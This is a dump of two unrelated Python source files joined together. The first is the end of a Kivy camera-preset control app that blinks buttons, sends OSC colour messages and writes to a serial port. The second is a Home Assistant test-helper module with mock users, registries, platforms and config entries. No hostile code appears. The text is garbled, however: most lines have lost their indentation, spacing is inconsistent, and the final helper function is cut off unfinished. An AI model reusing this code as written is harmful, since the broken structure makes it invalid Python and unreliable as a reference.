global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
if cam1Pos1Run and not cam1AtPos1:
self.root.ids.btnCam1Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/1", [48, 186, 49])
client.send_message("/style/color/3/1", [200, 200, 0])
client.send_message("/style/bgcolor/4/1", [48, 186, 49])
client.send_message("/style/color/4/1", [200, 200, 0])
if cam1Pos2Run and not cam1AtPos2:
self.root.ids.btnCam1Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/2", [48, 186, 49])
client.send_message("/style/color/3/2", [200, 200, 0])
client.send_message("/style/bgcolor/4/2", [48, 186, 49])
client.send_message("/style/color/4/2", [200, 200, 0])
if cam1Pos3Run and not cam1AtPos3:
self.root.ids.btnCam1Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/3", [48, 186, 49])
client.send_message("/style/color/3/3", [200, 200, 0])
client.send_message("/style/bgcolor/4/3", [48, 186, 49])
client.send_message("/style/color/4/3", [200, 200, 0])
if cam1Pos4Run and not cam1AtPos4:
self.root.ids.btnCam1Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/4", [48, 186, 49])
client.send_message("/style/color/3/4", [200, 200, 0])
client.send_message("/style/bgcolor/4/4", [48, 186, 49])
client.send_message("/style/color/4/4", [200, 200, 0])
if cam1Pos5Run and not cam1AtPos5:
self.root.ids.btnCam1Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/5", [48, 186, 49])
client.send_message("/style/color/3/5", [200, 200, 0])
client.send_message("/style/bgcolor/4/5", [48, 186, 49])
client.send_message("/style/color/4/5", [200, 200, 0])
if cam1Pos6Run and not cam1AtPos6:
self.root.ids.btnCam1Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/6", [48, 186, 49])
client.send_message("/style/color/3/6", [200, 200, 0])
client.send_message("/style/bgcolor/4/6", [48, 186, 49])
client.send_message("/style/color/4/6", [200, 200, 0])
if cam2Pos1Run and not cam2AtPos1:
self.root.ids.btnCam2Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/9", [92, 133, 186])
client.send_message("/style/color/3/9", [200, 200, 0])
client.send_message("/style/bgcolor/5/1", [92, 133, 186])
client.send_message("/style/color/5/1", [200, 200, 0])
#client.send_message("/Cam1Go1", [1, "AAAA00FF"])
if cam2Pos2Run and not cam2AtPos2:
self.root.ids.btnCam2Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/10", [92, 133, 186])
client.send_message("/style/color/3/10", [200, 200, 0])
client.send_message("/style/bgcolor/5/2", [92, 133, 186])
client.send_message("/style/color/5/2", [200, 200, 0])
if cam2Pos3Run and not cam2AtPos3:
self.root.ids.btnCam2Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/11", [92, 133, 186])
client.send_message("/style/color/3/11", [200, 200, 0])
client.send_message("/style/bgcolor/5/3", [92, 133, 186])
client.send_message("/style/color/5/3", [200, 200, 0])
if cam2Pos4Run and not cam2AtPos4:
self.root.ids.btnCam2Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/12", [92, 133, 186])
client.send_message("/style/color/3/12", [200, 200, 0])
client.send_message("/style/bgcolor/5/4", [92, 133, 186])
client.send_message("/style/color/5/4", [200, 200, 0])
if cam2Pos5Run and not cam2AtPos5:
self.root.ids.btnCam2Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/13", [92, 133, 186])
client.send_message("/style/color/3/13", [200, 200, 0])
client.send_message("/style/bgcolor/5/5", [92, 133, 186])
client.send_message("/style/color/5/5", [200, 200, 0])
if cam2Pos6Run and not cam2AtPos6:
self.root.ids.btnCam2Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/14", [92, 133, 186])
client.send_message("/style/color/3/14", [200, 200, 0])
client.send_message("/style/bgcolor/5/6", [92, 133, 186])
client.send_message("/style/color/5/6", [200, 200, 0])
if cam3Pos1Run and not cam3AtPos1:
self.root.ids.btnCam3Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/17", [186, 164, 1])
client.send_message("/style/color/3/17", [200, 200, 0])
client.send_message("/style/bgcolor/6/1", [186, 164, 1])
client.send_message("/style/color/6/1", [200, 200, 0])
if cam3Pos2Run and not cam3AtPos2:
self.root.ids.btnCam3Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/18", [186, 164, 1])
client.send_message("/style/color/3/18", [200, 200, 0])
client.send_message("/style/bgcolor/6/2", [186, 164, 1])
client.send_message("/style/color/6/2", [200, 200, 0])
if cam3Pos3Run and not cam3AtPos3:
self.root.ids.btnCam3Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/19", [186, 164, 1])
client.send_message("/style/color/3/19", [200, 200, 0])
client.send_message("/style/bgcolor/6/3", [186, 164, 1])
client.send_message("/style/color/6/3", [200, 200, 0])
if cam3Pos4Run and not cam3AtPos4:
self.root.ids.btnCam3Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/20", [186, 164, 1])
client.send_message("/style/color/3/20", [200, 200, 0])
client.send_message("/style/bgcolor/6/4", [186, 164, 1])
client.send_message("/style/color/6/4", [200, 200, 0])
if cam3Pos5Run and not cam3AtPos5:
self.root.ids.btnCam3Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/21", [186, 164, 1])
client.send_message("/style/color/3/21", [200, 200, 0])
client.send_message("/style/bgcolor/6/5", [186, 164, 1])
client.send_message("/style/color/6/5", [200, 200, 0])
if cam3Pos6Run and not cam3AtPos6:
self.root.ids.btnCam3Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/22", [186, 164, 1])
client.send_message("/style/color/3/22", [200, 200, 0])
client.send_message("/style/bgcolor/6/6", [186, 164, 1])
client.send_message("/style/color/6/6", [200, 200, 0])
Clock.schedule_once(self.setNormal, 0.5)
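# Dim phase of the blink started in flash().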
def setNormal(self, dt):
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
if cam1Pos1Run and not cam1AtPos1:
self.root.ids.btnCam1Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [50, 50, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [50, 50, 0])
if cam1Pos2Run and not cam1AtPos2:
self.root.ids.btnCam1Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [50, 50, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [50, 50, 0])
if cam1Pos3Run and not cam1AtPos3:
self.root.ids.btnCam1Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [50, 50, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [50, 50, 0])
if cam1Pos4Run and not cam1AtPos4:
self.root.ids.btnCam1Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [50, 50, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [50, 50, 0])
if cam1Pos5Run and not cam1AtPos5:
self.root.ids.btnCam1Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [50, 50, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [50, 50, 0])
if cam1Pos6Run and not cam1AtPos6:
self.root.ids.btnCam1Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [50, 50, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [50, 50, 0])
if cam2Pos1Run and not cam2AtPos1:
self.root.ids.btnCam2Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [50, 50, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [50, 50, 0])
#client.send_message("/Cam1Go1", [1, "000000FF"])
if cam2Pos2Run and not cam2AtPos2:
self.root.ids.btnCam2Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [50, 50, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [50, 50, 0])
if cam2Pos3Run and not cam2AtPos3:
self.root.ids.btnCam2Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [50, 50, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [50, 50, 0])
if cam2Pos4Run and not cam2AtPos4:
self.root.ids.btnCam2Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [50, 50, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [50, 50, 0])
if cam2Pos5Run and not cam2AtPos5:
self.root.ids.btnCam2Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [50, 50, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [50, 50, 0])
if cam2Pos6Run and not cam2AtPos6:
self.root.ids.btnCam2Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [50, 50, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [50, 50, 0])
if cam3Pos1Run and not cam3AtPos1:
self.root.ids.btnCam3Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [50, 50, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [50, 50, 0])
if cam3Pos2Run and not cam3AtPos2:
self.root.ids.btnCam3Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [50, 50, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [50, 50, 0])
if cam3Pos3Run and not cam3AtPos3:
self.root.ids.btnCam3Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [50, 50, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [50, 50, 0])
if cam3Pos4Run and not cam3AtPos4:
self.root.ids.btnCam3Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [50, 50, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [50, 50, 0])
if cam3Pos5Run and not cam3AtPos5:
self.root.ids.btnCam3Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [50, 50, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [50, 50, 0])
if cam3Pos6Run and not cam3AtPos6:
self.root.ids.btnCam3Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [50, 50, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [50, 50, 0])
def sendSerial(self, sendData):
if self.serial_port and self.serial_port.is_open:
if sys.version_info < (3, 0):
data = bytes(sendData + '\n')
else:
data = bytes((sendData + '\n'), 'utf8')
try:
self.serial_port.write(data)
#print(data)
            except Exception:
self.on_stop()
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
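# Illustrative sketch (not part of the original app): shows the framing that
# sendSerial applies before writing to the serial port -- the payload is
# newline-terminated and, on Python 3, UTF-8 encoded. The command string used
# here is purely hypothetical.
def _example_serial_framing(payload="example-command"):
    if sys.version_info < (3, 0):
        return bytes(payload + '\n')
    return bytes(payload + '\n', 'utf8')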
if __name__ == '__main__':
PTSApp().run()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
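# Hedged usage sketch (not part of the original helpers): register a fake
# service and assert on the captured calls. The domain/service names and the
# entity_id are illustrative only; `hass` is assumed to be a test instance.
async def _example_async_mock_service_usage(hass):
    """Sketch: record service calls made during a test."""
    calls = async_mock_service(hass, "light", "turn_on")
    await hass.services.async_call(
        "light", "turn_on", {"entity_id": "light.hypothetical"}, blocking=True
    )
    assert len(calls) == 1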
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
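# Hedged usage sketch (not part of the original helpers): a test can register a
# fake intent handler and then assert on what was handled. The intent type
# "HassTurnOn" and the `hass` fixture are assumptions for illustration only.
async def _example_async_mock_intent_usage(hass):
    """Sketch: capture intents of a given type handled during a test."""
    intents = async_mock_intent(hass, "HassTurnOn")
    await intent.async_handle(hass, "test", "HassTurnOn", {})
    assert len(intents) == 1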
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.pattern_utc_now",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
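# Hedged usage sketch (not part of the original helpers): fixtures are plain
# files under tests/fixtures, so JSON fixtures are typically decoded by the
# caller. The fixture file name used here is hypothetical.
def _example_load_json_fixture(filename="hypothetical_device.json"):
    """Sketch: load a fixture file and decode it as JSON."""
    return json.loads(load_fixture(filename))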
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
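# Hedged usage sketch (not part of the original helpers): a config-entry based
# test usually creates a MockConfigEntry and attaches it to hass before setting
# up the integration. The domain and data shown here are illustrative only.
def _example_mock_config_entry(hass):
    """Sketch: register a mock config entry for a hypothetical integration."""
    entry = MockConfigEntry(domain="hypothetical", data={"host": "127.0.0.1"})
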